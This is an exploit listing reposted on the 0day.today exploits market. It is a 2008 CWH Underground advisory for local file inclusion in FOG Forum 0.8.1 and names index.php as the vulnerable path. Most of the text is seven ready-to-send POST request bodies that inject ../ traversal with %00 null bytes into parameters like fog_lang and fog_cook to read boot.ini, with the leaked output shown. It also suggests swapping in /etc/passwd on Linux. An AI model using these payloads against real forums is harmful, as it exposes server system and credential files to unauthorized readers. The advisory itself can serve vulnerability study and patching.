[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FOG Forum 0.8.1 Multiple Local File Inclusion Vulnerabilities

Author
CWH Underground
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3155
Category
web applications
Date add
10-06-2008
Platform
unsorted
=============================================================
FOG Forum 0.8.1 Multiple Local File Inclusion Vulnerabilities
=============================================================



=======================================================
 FOG Forum 0.8.1 Local File Inclusion Vulnerabilities
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 10 June 2008


#####################################################
 APPLICATION : FOG Forum - PHP Board Engine
 VERSION     : 0.8.1
 VENDOR      : http://fog.daviveno.org
#####################################################

---Local File Inclusion Exploit (POST Method)---

---Description---

[+]Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept POST Method and edit in request data.
[+]All LFI Exploits were Vulnerablilities with POST Method

##############################################
Vulnerable File/Path:

[+]http://[Target]/[Path]/index.php

##############################################

---LFI Exploits (Use WebScarab to Edit request data)---

Send Request Data:

fog_skin=default&fog_lang=../../../../../../../../boot.ini%00
fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais
fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0&fog_action=0&fog_userid=cwhmail@cwh.com&fog_path=http://localhost/forum/index.php
fog_posted=../../../../../../../../boot.ini%00&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=0
fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0
fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=../../../../../../../../boot.ini%00&fog_cook=0
fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=../../../../../../../../boot.ini%00

Note: This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

      You can change boot.ini to /etc/passwd%00 in linux OS.

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################



#  0day.today [2024-12-27]  #